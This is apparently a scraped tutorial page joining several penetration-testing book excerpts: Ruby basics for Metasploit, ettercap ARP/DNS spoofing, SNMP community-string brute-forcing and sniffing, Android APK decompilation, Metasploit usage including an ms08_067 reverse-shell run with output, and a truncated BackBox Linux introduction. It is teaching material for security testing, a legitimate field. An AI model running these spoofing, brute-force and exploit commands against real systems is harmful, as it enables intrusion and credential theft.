variable is a placeholder for values that can change at any given time. In Ruby, we declare a variable only when we need to use it. Ruby supports numerous variables' data types, but we will only discuss those that are relevant to Metasploit. Let's see what they are. Working with strings Strings are objects that represent a stream or sequence of characters. In Ruby, we can assign a string value to a variable with ease as seen in the previous example. By simply defining the value in quotation marks or a single quotation mark, we can assign a value to a string. It is recommended to use double quotation marks because if single quotations are used, it can create problems. Let's have a look at the problem that may arise: irb(main):005:0> name = 'Msf Book' => "Msf Book" irb(main):006:0> name = 'Msf's Book' irb(main):007:0' ' We can see that when we used a single quotation mark, it worked. However, when we tried to put Msf's instead of the value Msf, an error occurred. This is because it read the single quotation mark in the Msf's string as the end of single quotations, which is not the case; this situation caused a syntax-based error. The split function We can split the value of a string into a number of consecutive variables using the split function. Let's have a look at a quick example that demonstrates this: irb(main):011:0> name = "nipun jaswal" => "nipun jaswal" irb(main):012:0> name,surname=name.split(' ') => ["nipun", "jaswal"] irb(main):013:0> name => "nipun" irb(main):014:0> surname => "jaswal" Here, we have split the value of the entire string into two consecutive strings, name and surname by using the split function. However, this function split the entire string into two strings by considering the space to be the split's position. The squeeze function The squeeze function removes extra spaces from the given string, as shown in the following code snippet: irb(main):016:0> name = "Nipun Jaswal" => "Nipun Jaswal" irb(main):017:0> name.squeeze => "Nipun Jaswal" Numbers and conversions in Ruby We can use numbers directly in arithmetic operations. However, remember to convert a string into an integer when working on user input using the .to_i function. Simultaneously, we can convert an integer number into a string using the .to_s function. Let's have a look at some quick examples and their output: irb(main):006:0> b="55" => "55" irb(main):007:0> b+10 TypeError: no implicit conversion of Fixnum into String from (irb):7:in `+' from (irb):7 from C:/Ruby200/bin/irb:12:in `<main>' irb(main):008:0> b.to_i+10 => 65 irb(main):009:0> a=10 => 10 irb(main):010:0> b="hello" => "hello" irb(main):011:0> a+b TypeError: String can't be coerced into Fixnum from (irb):11:in `+' from (irb):11 from C:/Ruby200/bin/irb:12:in `<main>' irb(main):012:0> a.to_s+b => "10hello" We can see that when we assigned a value to b in quotation marks, it was considered as a string, and an error was generated while performing the addition operation. Nevertheless, as soon as we used the to_i function, it converted the value from a string into an integer variable, and addition was performed successfully. Similarly, with regards to strings, when we tried to concatenate an integer with a string, an error showed up. However, after the conversion, it worked. Ranges in Ruby Ranges are important aspects and are widely used in auxiliary modules such as scanners and fuzzers in Metasploit. Let's define a range and look at the various operations we can perform on this data type: irb(main):028:0> zero_to_nine= 0..9 => 0..9 irb(main):031:0> zero_to_nine.include?(4) => true irb(main):032:0> zero_to_nine.include?(11) => false irb(main):002:0> zero_to_nine.each{|zero_to_nine| print(zero_to_nine)} 0123456789=> 0..9 irb(main):003:0> zero_to_nine.min => 0 irb(main):004:0> zero_to_nine.max => 9 We can see that a range offers various operations such as searching, finding the minimum and maximum values, and displaying all the data in a range. Here, the include? function checks whether the value is contained in the range or not. In addition, the min and max functions display the lowest and highest values in a range. Arrays in Ruby We can simply define arrays as a list of various values. Let's have a look at an example: irb(main):005:0> name = ["nipun","james"] => ["nipun", "james"] irb(main):006:0> name[0] => "nipun" irb(main):007:0> name[1] => "james" So, up to this point, we have covered all the required variables and data types that we will need for writing Metasploit modules. For more information on variables and data types, refer to the following link: http://www.tutorialspoint.com/ruby/ Refer to a quick cheat sheet for using Ruby programming effectively at the following links: https://github.com/savini/cheatsheets/raw/master/ruby/RubyCheat.pdf http://hyperpolyglot.org/scripting Methods in Ruby A method is another name for a function. Programmers with a different background than Ruby might use these terms interchangeably. A method is a subroutine that performs a specific operation. The use of methods implements the reuse of code and decreases the length of programs significantly. Defining a method is easy, and their definition starts with the def keyword and ends with the end statement. Let's consider a simple program to understand their working, for example, printing out the square of 50: def print_data(par1) square = par1*par1 return square end answer=print_data(50) print(answer) The print_data method receives the parameter sent from the main function, multiplies it with itself, and sends it back using the return statement. The program saves this returned value in a variable named answer and prints the value. Decision-making operators Decision making is also a simple concept as with any other programming language. Let's have a look at an example: irb(main):001:0> 1 > 2 => false irb(main):002:0> 1 < 2 => true Let's also consider the case of string data: irb(main):005:0> "Nipun" == "nipun" => false irb(main):006:0> "Nipun" == "Nipun" => true Let's consider a simple program with decision-making operators: #Main num = gets num1 = num.to_i decision(num1) #Function def decision(par1) print(par1) par1= par1 if(par1%2==0) print("Number is Even") else print("Number is Odd") end end We ask the user to enter a number and store it in a variable named num using gets. However, gets will save the user input in the form of a string. So, let's first change its data type to an integer using the to_i method and store it in a different variable named num1. Next, we pass this value as an argument to the method named decision and check whether the number is divisible by two. If the remainder is equal to zero, it is concluded that the number is divisible by true, which is why the if block is executed; if the condition is not met, the else block is executed. The output of the preceding program will be something similar to the following screenshot when executed in a Windows-based environment:
Read more
  • 0
  • 0
  • 7632

article-image-network-exploitation-and-monitoring
Packt
22 May 2014
8 min read
Save for later

Network Exploitation and Monitoring

Packt
22 May 2014
8 min read
(For more resources related to this topic, see here.) Man-in-the-middle attacks Using ARP abuse, we can actually perform more elaborate man-in-the-middle (MITM)-style attacks building on the ability to abuse address resolution and host identification schemes. This section will focus on the methods you can use to do just that. MITM attacks are aimed at fooling two entities on a given network into communicating by the proxy of an unauthorized third party, or allowing a third party to access information in transit, being communicated between two entities on a network. For instance, when a victim connects to a service on the local network or on a remote network, a man-in-the-middle attack will give you as an attacker the ability to eavesdrop on or even augment the communication happening between the victim and its service. By service, we could mean a web (HTTP), FTP, RDP service, or really anything that doesn't have the inherent means to defend itself against MITM attacks, which turns out to be quite a lot of the services we use today! Ettercap DNS spoofing Ettercap is a tool that facilitates a simple command line and graphical interface to perform MITM attacks using a variety of techniques. In this section, we will be focusing on applications of ARP spoofing attacks, namely DNS spoofing. You can set up a DNS spoofing attack with ettercap by performing the following steps: Before we get ettercap up and running, we need to modify the file that holds the DNS records for our soon-to-be-spoofed DNS server. This file is found under /usr/share/ettercap/etter.dns. What you need to do is either add DNS name and IP addresses or modify the ones currently in the file by replacing all the IPs with yours, if you'd like to act as the intercepting host. Now that our DNS server records are set up, we can invoke ettercap. Invoking ettercap is pretty straightforward; here's the usage specification: ettercap [OPTIONS] [TARGET1] [TARGET2] To perform a MITM attack using ettercap, you need to supply the –M switch and pass it an argument indicating the MITM method you'd like to use. In addition, you will also need to specify that you'd like to use the DNS spoofing plugin. Here's what the invocation will look like: ettercap –M arp:remote –P dns_spoof [TARGET1] [TARGET2] Where TARGET1 and TARGET2 is the host you want to intercept and either the default gateway or DNS server, interchangeably. To target the host at address 192.168.10.106 with a default gateway of 192.168.10.1, you will invoke the following command: ettercap –M arp:remote –P dns_spoof /192.168.10.107//192.168.10.1/ Once launched, ettercap will begin poisoning the ARP tables of the specified hosts and listen for any DNS requests to the domains it's configured to resolve. Interrogating servers For any network device to participate in communication, certain information needs to be accessible to it, no device will be able to look up a domain name or find an IP address without the participation of devices in charge of certain information. In this section, we will detail some techniques you can use to interrogate common network components for sensitive information about your target network and the hosts on it. SNMP interrogation The Simple Network Management Protocol (SNMP) is used by routers and other network components in order to support remote monitoring of things such as bandwidth, CPU/Memory usage, hard disk space usage, logged on users, running processes, and a number of other incredibly sensitive collections of information. Naturally, any penetration tester with an exposed SNMP service on their target network will need to know how to proliferate any potentially useful information from it. About SNMP Security SNMP services before Version 3 are not designed with security in mind. Authentication to these services often comes in the form a simple string of characters called a community string. Another common implementation flaw that is inherent to SNMP Version 1 and 2 is the ability to brute-force and eavesdrop on communication. To enumerate SNMP servers for information using the Kali Linux tools, you could resort to a number of techniques. The most obvious one will be snmpwalk, and you can use it by using the following command: snmpwalk –v [1 | 2c | 3 ] –c [community string] [target host] For example, let's say we were targeting 192.168.10.103 with a community string of public, which is a common community string setting; you will then invoke the following command to get information from the SNMP service: snmpwalk –v 1 –c public 192.168.10.103 Here, we opted to use SNMP Version 1, hence the –v 1 in the invocation for the preceding command. The output will look something like the following screenshot: As you can see, this actually extracts some pretty detailed information about the targeted host. Whether this is a critical vulnerability or not will depend on which kind of information is exposed. On Microsoft Windows machines and some popular router operating systems, SNMP services could expose user credentials and even allow remote attackers to augment them maliciously, should they have write access to the SNMP database. Exploiting SNMP successfully is often strongly depended on the device implementing the service. You could imagine that for routers, your target will probably be the routing table or the user accounts on the device. For other host types, the attack surface may be quite different. Try to assess the risk of SNMP-based flaws and information leaks with respect to its host and possibly the wider network it's hosted on. Don't forget that SNMP is all about sharing information, information that other hosts on your network probably trust. Think about the kind of information accessible and what you will be able to do with it should you have the ability to influence it. If you can attack the host, attack the hosts that trust it. Another collection of tools is really great at collecting information from SNMP services: the snmp_enum, snmp_login, and similar scripts available in the Metasploit Framework. The snmp_enum script pretty much does exactly what snmpwalk does except it structures the extracted information in a friendlier format. This makes it easier to understand. Here's an example: msfcli auxiliary/scanner/snmp/snmp_enum [OPTIONS] [MODE] The options available for this module are shown in the following screenshot: Here's an example invocation against the host in our running example: msfcli auxiliary/scanner/snmp/snmp_enum RHOSTS=192.168.10.103 The preceding command produces the following output: You will notice that we didn't specify the community string in the invocation. This is because the module assumes a default of public. You can specify a different one using the COMMUNITY parameter. In other situations, you may not always be lucky enough to preemptively know the community string being used. However, luckily SNMP Version 1, 2, 2c, and 3c do not inherently have any protection against brute-force attacks, nor do any of them use any form of network based encryption. In the case of SNMP Version 1 and 2c, you could use a nifty Metasploit module called snmp-login that will run through a list of possible community strings and determine the level of access the enumerated strings gives you. You can use it by running the following command: msfcli auxiliary/scanner/snmp/snmp_login RHOSTS=192.168.10.103 The preceding command produces the following output: As seen in the preceding screenshot, once the run is complete it will list the enumerated strings along with the level of access granted. The snmp_login module uses a static list of possible strings to do its enumeration by default, but you could also run this module on some of the password lists that ship with Kali Linux, as follows: msfcli auxiliary/scanner/snmp/snmp_login PASS_FILE=/usr/share/wordlists/ rockyou.txt RHOSTS=192.168.10.103 This will use the rockyou.txt wordlist to look for strings to guess with. Because all of these Metasploit modules are command line-driven, you can of course combine them. For instance, if you'd like to brute-force a host for the SNMP community strings and then run the enumeration module on the strings it finds, you can do this by crafting a bash script as shown in the following example: #!/bin/bash if [ $# != 1 ] then echo "USAGE: . snmp [HOST]" exit 1 fi TARGET=$1 echo "[*] Running SNMP enumeration on '$TARGET'" for comm_string in `msfcli auxiliary/scanner/snmp/snmp_login RHOSTS=$TARGET E 2> /dev/null | awk -F' '/access with community/ { print $2 }'`; do echo "[*] found community string '$comm_string' ...running enumeration"; msfcli auxiliary/scanner/snmp/snmp_enum RHOSTS=$TARGET COMMUNITY=$comm_string E 2> /dev/null; done The following command shows you how to use it: . snmp.sh [TAGRET] In our running example, it is used as follows: . snmp.sh 192.168.10.103 Other than guessing or brute-forcing SNMP community strings, you could also use TCPDump to filter out any packets that could contain unencrypted SNMP authentication information. Here's a useful example: tcpdump udp port 161 –i eth0 –vvv –A The preceding command will produce the following output: Without going too much into detail about the SNMP packet structure, looking through the printable strings captured, it's usually pretty easy to see the community string. You may also want to look at building a more comprehensive packet-capturing tool using something such as Scapy, which is available in Kali Linux versions.
Read more
  • 0
  • 0
  • 2644
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at $19.99/month. Cancel anytime
article-image-reversing-android-applications
Packt
20 Mar 2014
8 min read
Save for later

Reversing Android Applications

Packt
20 Mar 2014
8 min read
(For more resources related to this topic, see here.) Android application teardown An Android application is an archive file of the data and resource files created while developing the application. The extension of an Android application is .apk, meaning application package, which includes the following files and folders in most cases: Classes.dex (file) AndroidManifest.xml (file) META-INF (folder) resources.arsc (file) res (folder) assets (folder) lib (folder) In order to verify this, we could simply unzip the application using any archive manager application, such as 7zip, WinRAR, or any preferred application. On Linux or Mac, we could simply use the unzip command in order to show the contents of the archive package, as shown in the following screenshot: Here, we have used the -l (list) flag in order to simply show the contents of the archive package instead of extracting it. We could also use the file command in order to see whether it is a valid archive package. An Android application consists of various components, which together create the working application. These components are Activities, Services, Broadcast Receivers, Content providers, and Shared Preferences. Before proceeding, let's have a quick walkthrough of what these different components are all about: Activities: These are the visual screens which a user could interact with. These may include buttons, images, TextView, or any other visual component. Services: These are the Android components which run in the background and carry out specific tasks specified by the developer. These tasks may include anything from downloading a file over HTTP to playing music in the background. Broadcast Receivers: These are the receivers in the Android application that listen to the incoming broadcast messages by the Android system, or by other applications present in the device. Once they receive a broadcast message, a particular action could be triggered depending on the predefined conditions. The conditions could range from receiving an SMS, an incoming phone call, a change in the power supply, and so on. Shared Preferences: These are used by an application in order to save small sets of data for the application. This data is stored inside a folder named shared_prefs. These small datasets may include name value pairs such as the user's score in a game and login credentials. Storing sensitive information in shared preferences is not recommended, as they may fall vulnerable to data stealing and leakage. Intents: These are the components which are used to bind two or more different Android components together. Intents could be used to perform a variety of tasks, such as starting an action, switching activities, and starting services. Content Providers: These are used to provide access to a structured set of data to be used by the application. An application can access and query its own data or the data stored in the phone using the Content Providers. Now that we know of the Android application internals and what an application is composed of, we can move on to reversing an Android application. That is getting the readable source code and other data sources when we just have the .apk file with us. Reversing an Android application As we discussed earlier, that Android applications are simply an archive file of data and resources. Even then, we can't simply unzip the archive package (.apk) and get the readable sources. For these scenarios, we have to rely on tools that will convert the byte code (as in classes.dex) into readable source code. One of the approaches to convert byte codes to readable files is using a tool called dex2jar. The .dex file is the converted Java bytecode to Dalvik bytecode, making it optimized and efficient for mobile platforms. This free tool simply converts the .dex file present in the Android application to a corresponding .jar file. Please follow the ensuing steps: Download the dex2jar tool from https://code.google.com/p/dex2jar/. Now we can use it to run against our application's .dex file and convert to .jar format. Now, all we need to do is go to the command prompt and navigate to the folder where dex2jar is located. Next, we need to run the d2j-dex2jar.bat file (on Windows) or the d2j-dex2jar.sh file (on Linux/Mac) and provide the application name and path as the argument. Here in the argument, we could simply use the .apk file, or we could even unzip the .apk file and then pass the classes.dex file instead, as shown in the following screenshot: As we can see in the preceding screenshot, dex2jar has successfully converted the .dex file of the application to a .jar file named helloworld-dex2jar.jar. Now, we can simply open this .jar file in any Java graphical viewer such as JD-GUI, which can be downloaded from its official website at http://jd.benow.ca/. Once we download and install JD-GUI, we could now go ahead and open it. It will look like the one shown in the following screenshot: Here, we could now open up the converted .jar file from the earlier step and see all the Java source code in JD-GUI. To open a .jar file, we could simply navigate to File | Open. In the right-hand side pane, we can see the Java sources and all the methods of the Android application. Note that the recompilation process will give you an approximate version of the original Java source code. This won't matter in most cases; however, in some cases, you might see that some of the code is missing from the converted .jar file. Also, if the application developer is using some protections against decompilations such as proguard and dex2jar, when we decompile the application using dex2jar or Apktool, we won't be seeing the exact source code; instead, we will see a bunch of different source files, which won't be the exact representation of the original source code. Using Apktool to reverse an Android application Another way of reversing an Android application is converting the .dex file to smali files. A smali is a file format whose syntax is similar to a language known as Jasmine. We won't be going in depth into the smali file format as of now. For more information, take a look at the online wiki at https://code.google.com/p/smali/wiki/ in order to get an in-depth understanding of smali. Once we have downloaded Apktool and configured it, we are all set to go further. The main advantage of Apktool over JD-GUI is that it is bidirectional. This means if you decompile an application and modify it, and then recompile it back using Apktool, it will recompile perfectly and will generate a new .apk file. However, dex2jar and JD-GUI won't be able to do this similar functionality, as it gives an approximate code and not the exact code. So, in order to decompile an application using Apktool, all we need to do is to pass in the .apk filename along with the Apktool binary. Once decompiled, Apktool will create a new folder with the application name in which all of the files will be stored. To decompile, we will simply go ahead and use apktool d [app-name].apk. Here, the -d flag stands for decompilation. In the following screenshot, we can see an app being decompiled using Apktool: Now, if we go inside the smali folder, we will see a bunch of different smali files, which will contain the code of the Java classes that were written while developing the application. Here, we can also open up a file, change the values, and use Apktool to build it back again. To build a modified application from smali, we will use the b (build) flag in Apktool. apktool d [decompiled folder name] [target-app-name].apk However, in order to decompile, modify, and recompile applications, I would personally recommend using another tool called Virtuous Ten Studio (VTS). This tool offers similar functionalities as Apktool, with the only difference that VTS presents it in a nice graphical interface, which is relatively easy to use. The only limitation for this tool is it runs natively only on the Windows environment. We could go ahead and download VTS from the official download link, http://www.virtuous-ten-studio.com/. The following is a screenshot of the application decompiling the same project: Summary In this article, we covered some of the methods and techniques that are used to reverse the Android applications. Resources for Article: Further resources on this subject: Android Native Application API [Article] Introducing an Android platform [Article] Animating Properties and Tweening Pages in Android 3-0 [Article]
Read more
  • 0
  • 0
  • 3673

article-image-target-exploitation
Packt
14 Mar 2014
14 min read
Save for later

Target Exploitation

Packt
14 Mar 2014
14 min read
(For more resources related to this topic, see here.) Vulnerability research Understanding the capabilities of a specific software or hardware product may provide a starting point for investigating vulnerabilities that could exist in that product. Conducting vulnerability research is not easy, neither is it a one-click task. Thus, it requires a strong knowledge base with different factors to carry out security analysis. The following are the factors to carry out security analysis: Programming skills: This is a fundamental factor for ethical hackers. Learning the basic concepts and structures that exist with any programming language should grant the tester with an imperative advantage of finding vulnerabilities. Apart from the basic knowledge of programming languages, you must be prepared to deal with the advanced concepts of processors, system memory, buffers, pointers, data types, registers, and cache. These concepts are implementable in almost any programming language such as C/C++, Python, Perl, and Assembly. To learn the basics of writing an exploit code from a discovered vulnerability, please visit http://www.phreedom.org/presentations/exploit-code-development/. Reverse engineering: This is another wide area for discovering the vulnerabilities that could exist in the electronic device, software, or system by analyzing its functions, structures, and operations. The purpose is to deduce a code from a given system without any prior knowledge of its internal working, to examine it for error conditions, poorly designed functions, and protocols, and to test the boundary conditions. There are several reasons that inspire the practice of reverse engineering skills such as the removal of copyright protection from a software, security auditing, competitive technical intelligence, identification of patent infringement, interoperability, understanding the product workflow, and acquiring the sensitive data. Reverse engineering adds two layers of concept to examine the code of an application: source code auditing and binary auditing. If you have access to the application source code, you can accomplish the security analysis through automated tools or manually study the source in order to extract the conditions where vulnerability can be triggered. On the other hand, binary auditing simplifies the task of reverse engineering where the application exists without any source code. Disassemblers and decompilers are two generic types of tools that may assist the auditor with binary analysis. Disassemblers generate the assembly code from a complied binary program, while decompilers generate a high-level language code from a compiled binary program. However, dealing with either of these tools is quite challenging and requires a careful assessment. Instrumented tools: Instrumented tools such as debuggers, data extractors, fuzzers, profilers, code coverage, flow analyzers, and memory monitors play an important role in the vulnerability discovery process and provide a consistent environment for testing purposes. Explaining each of these tool categories is out of the scope of this book. However, you may find several useful tools already present under Kali Linux. To keep a track of the latest reverse code engineering tools, we strongly recommend that you visit the online library at http://www.woodmann.com/collaborative/tools/index.php/Category:RCE_Tools. Exploitability and payload construction: This is the final step in writing the proof-of-concept (PoC) code for a vulnerable element of an application, which could allow the penetration tester to execute custom commands on the target machine. We apply our knowledge of vulnerable applications from the reverse engineering stage to polish shellcode with an encoding mechanism in order to avoid bad characters that may result in the termination of the exploit process. Depending on the type and classification of vulnerability discovered, it is very significant to follow the specific strategy that may allow you to execute an arbitrary code or command on the target system. As a professional penetration tester, you may always be looking for loopholes that should result in getting a shell access to your target operating system. Thus, we will demonstrate a few scenarios with the Metasploit framework, which will show these tools and techniques. Vulnerability and exploit repositories For many years, a number of vulnerabilities have been reported in the public domain. Some of these were disclosed with the PoC exploit code to prove the feasibility and viability of a vulnerability found in the specific software or application. And, many still remain unaddressed. This competitive era of finding the publicly available exploits and vulnerability information makes it easier for penetration testers to quickly search and retrieve the best available exploit that may suit their target system environment. You can also port one type of exploit to another type (for example, Win32 architecture to Linux architecture) provided that you hold intermediate programming skills and a clear understanding of OS-specific architecture. We have provided a combined set of online repositories that may help you to track down any vulnerability information or its exploit by searching through them. Not every single vulnerability found has been disclosed to the public on the Internet. Some are reported without any PoC exploit code, and some do not even provide detailed vulnerability information. For this reason, consulting more than one online resource is a proven practice among many security auditors. The following is a list of online repositories: Repository name Website URL Bugtraq SecurityFocus http://www.securityfocus.com OSVDB Vulnerabilities http://osvdb.org Packet Storm http://www.packetstormsecurity.org VUPEN Security http://www.vupen.com National Vulnerability Database http://nvd.nist.gov ISS X-Force http://xforce.iss.net US-CERT Vulnerability Notes http://www.kb.cert.org/vuls US-CERT Alerts http://www.us-cert.gov/cas/techalerts/ SecuriTeam http://www.securiteam.com Government Security Org http://www.governmentsecurity.org Secunia Advisories http://secunia.com/advisories/historic/ Security Reason http://securityreason.com XSSed XSS-Vulnerabilities http://www.xssed.com Security Vulnerabilities Database http://securityvulns.com SEBUG http://www.sebug.net BugReport http://www.bugreport.ir MediaService Lab http://lab.mediaservice.net Intelligent Exploit Aggregation Network http://www.intelligentexploit.com Hack0wn http://www.hack0wn.com Although there are many other Internet resources available, we have listed only a few reviewed ones. Kali Linux comes with an integration of exploit database from Offensive Security. This provides an extra advantage of keeping all archived exploits to date on your system for future reference and use. To access Exploit-DB, execute the following commands on your shell: # cd /usr/share/exploitdb/ # vim files.csv This will open a complete list of exploits currently available from Exploit-DB under the /pentest/exploits/exploitdb/platforms/ directory. These exploits are categorized in their relevant subdirectories based on the type of system (Windows, Linux, HP-UX, Novell, Solaris, BSD, IRIX, TRU64, ASP, PHP, and so on). Most of these exploits were developed using C, Perl, Python, Ruby, PHP, and other programming technologies. Kali Linux already comes with a handful set of compilers and interpreters that support the execution of these exploits. How to extract particular information from the exploits list? Using the power of bash commands, you can manipulate the output of any text file in order to retrieve the meaningful data. You can either use searchsploit, or this can also be accomplished by typing cat files.csv |grep '"' |cut -d";" -f3 on your console. It will extract the list of exploit titles from a files.csv file. To learn the basic shell commands, please refer to http://tldp.org/LDP/abs/html/index.html. Advanced exploitation toolkit Kali Linux is preloaded with some of the best and most advanced exploitation toolkits. The Metasploit framework (http://www.metasploit.com) is one of these. We have explained it in a greater detail and presented a number of scenarios that would effectively increase the productivity and enhance your experience with penetration testing. The framework was developed in the Ruby programming language and supports modularization such that it makes it easier for the penetration tester with optimum programming skills to extend or develop custom plugins and tools. The architecture of a framework is divided into three broad categories: libraries, interfaces, and modules. A key part of our exercises is to focus on the capabilities of various interfaces and modules. Interfaces (console, CLI, web, and GUI) basically provide the front-end operational activity when dealing with any type of modules (exploits, payloads, auxiliaries, encoders, and NOP). Each of the following modules have their own meaning and are function-specific to the penetration testing process. Exploit: This module is the proof-of-concept code developed to take advantage of a particular vulnerability in a target system Payload: This module is a malicious code intended as a part of an exploit or independently compiled to run the arbitrary commands on the target system Auxiliaries: These modules are the set of tools developed to perform scanning, sniffing, wardialing, fingerprinting, and other security assessment tasks Encoders: These modules are provided to evade the detection of antivirus, firewall, IDS/IPS, and other similar malware defenses by encoding the payload during a penetration operation No Operation or No Operation Performed (NOP): This module is an assembly language instruction often added into a shellcode to perform nothing but to cover a consistent payload space For your understanding, we have explained the basic use of two well-known Metasploit interfaces with their relevant command-line options. Each interface has its own strengths and weaknesses. However, we strongly recommend that you stick to a console version as it supports most of the framework features. MSFConsole MSFConsole is one of the most efficient, powerful, and all-in-one centralized front-end interface for penetration testers to make the best use of the exploitation framework. To access msfconsole, navigate to Applications | Kali Linux | Exploitation Tools | Metasploit | Metasploit framework or use the terminal to execute the following command: # msfconsole You will be dropped into an interactive console interface. To learn about all the available commands, you can type the following command: msf > help This will display two sets of commands; one set will be widely used across the framework, and the other will be specific to the database backend where the assessment parameters and results are stored. Instructions about other usage options can be retrieved through the use of -h, following the core command. Let us examine the use of the show command as follows: msf > show -h [*] Valid parameters for the "show" command are: all, encoders, nops, exploits, payloads, auxiliary, plugins, options [*] Additional module-specific parameters are: advanced, evasion, targets, actions This command is typically used to display the available modules of a given type or all of the modules. The most frequently used commands could be any of the following: show auxiliary: This command will display all the auxiliary modules show exploits: This command will get a list of all the exploits within the framework show payloads: This command will retrieve a list of payloads for all platforms. However, using the same command in the context of a chosen exploit will display only compatible payloads. For instance, Windows payloads will only be displayed with the Windows-compatible exploits show encoders: This command will print the list of available encoders show nops: This command will display all the available NOP generators show options: This command will display the settings and options available for the specific module show targets: This command will help us to extract a list of target OS supported by a particular exploit module show advanced: This command will provide you with more options to fine-tune your exploit execution We have compiled a short list of the most valuable commands in the following table; you can practice each one of them with the Metasploit console. The italicized terms next to the commands will need to be provided by you: Commands Description check To verify a particular exploit against your vulnerable target without exploiting it. This command is not supported by many exploits. connect ip port Works similar to that of Netcat and Telnet tools. exploit To launch a selected exploit. run To launch a selected auxiliary. jobs Lists all the background modules currently running and provides the ability to terminate them. route add subnet netmask sessionid To add a route for the traffic through a compromised session for network pivoting purposes. info module Displays detailed information about a particular module (exploit, auxiliary, and so on). set param value To configure the parameter value within a current module. setg param value To set the parameter value globally across the framework to be used by all exploits and auxiliary modules. unset param It is a reverse of the set command. You can also reset all variables by using the unset all command at once. unsetg param To unset one or more global variables. sessions Ability to display, interact, and terminate the target sessions. Use with -l for listing, -i ID for interaction, and -k ID for termination. search string Provides a search facility through module names and descriptions. use module Select a particular module in the context of penetration testing. It is important for you to understand their basic use with different sets of modules within the framework. MSFCLI Similar to the MSFConsole interface, a command-line interface (CLI) provides an extensive coverage of various modules that can be launched at any one instance. However, it lacks some of the advanced automation features of MSFConsole. To access msfcli, use the terminal to execute the following command: # msfcli -h This will display all the available modes similar to that of MSFConsole as well as usage instructions for selecting the particular module and setting its parameters. Note that all the variables or parameters should follow the convention of param=value and that all options are case-sensitive. We have presented a small exercise to select and execute a particular exploit as follows: # msfcli windows/smb/ms08_067_netapi O [*] Please wait while we load the module tree...      Name     Current Setting  Required  Description    ----     ---------------  --------  -----------    RHOST                     yes       The target address    RPORT    445              yes       Set the SMB service port    SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC) The use of O at the end of the preceding command instructs the framework to display the available options for the selected exploit. The following command sets the target IP using the RHOST parameter: # msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.7 P [*] Please wait while we load the module tree...   Compatible payloads ===================      Name                             Description    ----                             -----------    generic/debug_trap               Generate a debug trap in the target process    generic/shell_bind_tcp           Listen for a connection and spawn a command shell ... Finally, after setting the target IP using the RHOST parameter, it is time to select the compatible payload and execute our exploit as follows: # msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.7 LHOST=192.168.0.3 PAYLOAD=windows/shell/reverse_tcp E [*] Please wait while we load the module tree... [*] Started reverse handler on 192.168.0.3:4444 [*] Automatically detecting the target... [*] Fingerprint: Windows XP Service Pack 2 - lang:English [*] Selected Target: Windows XP SP2 English (NX) [*] Attempting to trigger the vulnerability... [*] Sending stage (240 bytes) to 192.168.0.7 [*] Command shell session 1 opened (192.168.0.3:4444 -> 192.168.0.7:1027)   Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.   C:WINDOWSsystem32> As you can see, we have acquired a local shell access to our target machine after setting the LHOST parameter for a chosen payload.
Read more
  • 0
  • 0
  • 3675

article-image-starting-out-backbox-linux
Packt
17 Feb 2014
11 min read
Save for later

Starting Out with BackBox Linux

Packt
17 Feb 2014
11 min read
(For more resources related to this topic, see here.) A flexible penetration testing distribution BackBox Linux is a very young project designed for penetration testing, vulnerability assessment and management. The key focus in using BackBox is to provide an independent security testing platform that can be easily customized with increased performance and stability. BackBox uses a very light desktop manager called XFCE. It includes the most popular security auditing tools that are essential for penetration testers and security advisers. The suite of tools includes web application analysis, network analysis, stress tests, computer sniffing forensic analysis, exploitation, documentation, and reporting. The BackBox repository is hosted on Launchpad and is constantly updated to the latest stable version of its tools. Adding and developing new tools inside the distribution requires it to be compliant with the open source community and particularly the Debian Free Software Guidelines criteria. IT security and penetration testing are dedicated sectors and quite new in the global market. There are a lot of Linux distributions dedicated to security; but if we do some research, we can see that only a couple of distributions are constantly updated. Many newly born projects stop at the first release without continuity and very few of them are updated. BackBox is one of the new players in this field and even though it is only a few years old, it has acquired an enormous user base and now holds the second place in worldwide rankings. It is a lightweight, community-built penetration testing distribution capable of running live in USB mode or as a permanent installation. BackBox now operates on release 3.09 as of September 2013, with a significant increase in users, thus becoming a stable community. BackBox is also significantly used in the professional world. BackBox is built on top of Ubuntu LTS and the 3.09 release uses 12.04 as its core. The desktop manager environment with XFCE and the ISO images are provided for 32-bit and 64-bit platforms (with the availability on Torrents and HTTP downloads from the project's website). The following screenshot shows the main view of the desktop manager, XFCE: The choice of desktop manager, XFCE, plays a very important role in BackBox. It is not only designed to serve the slender environment with medium and low level of resources, but also designed for very low memory. In case of very low memory and other resources (such as CPU, HD, and video), BackBox has an alternative way of booting the system without graphical user interface (GUI) and using command-line only, which requires really minimal amount of resources. With this aim in mind, BackBox is designed to function with pretty old and obsolete hardware to be used as a normal auditing platform. However, BackBox can be used on more powerful systems to perform actions that require the modern multicore processors to reduce ETA of the task such as brute-force attacks, data/password decryption, and password-cracking. Of course, the BackBox team aims to minimize overhead for the aforementioned cases through continuous research and development. Luckily, the majority of the tools included in BackBox can be performed in a shell/console environment and for the ones which require less resource. However, we always have our XFCE interface where we can access user-friendly GUI tools (in particular network analysis tools), which do not require many resources. Relatively, newcomer into the IT security and penetration testing environment, the first release of BackBox was back in September 09, 2010, as a project of the Italian web community. Now on its third major release and close to the next minor release (BackBox Linux 3.13 is planned for the end of January 2014), BackBox has grown rapidly and offers a wide scope for both amateur and professional use. The minimum requirements for BackBox are as follows: A 32-bit or 64-bit processor 512 MB of system memory RAM (256 MB in case there will be no desktop manager usage and only the console) 4.4 GB of disk space for installation Graphics card capable of 800 × 600 resolution (less resolution in case there will be no desktop manager usage) DVD-ROM drive or USB port The following screenshot shows the main view of BackBox with a toolbar at the bottom: The suite of auditing tools in BackBox makes the system complete and ready to use for security professionals of penetration testing. The organization of tools in BackBox. The entire set of BackBox security tools are populated into a single menu called Audit and structured into different subtasks as follows: Information Gathering Vulnerability Assessment Exploitation Privilege Escalation Maintaining Access Documentation & Reporting Social Engineering Stress Testing Forensic Analysis VoIP Analysis Wireless Analysis Miscellaneous We have to run through all the tools in BackBox by giving a short description of each single tool in the Auditing menu. The following screenshot shows the Auditing menu of BackBox: Information Gathering Information Gathering is the first absolute step of any security engineer and/or penetration tester. It is about collecting information on target systems, which can be very useful to start the assessment. Without this step, it will be quite difficult and hard to assess any system. Vulnerability Assessment After you've gathered information by performing the first step, the 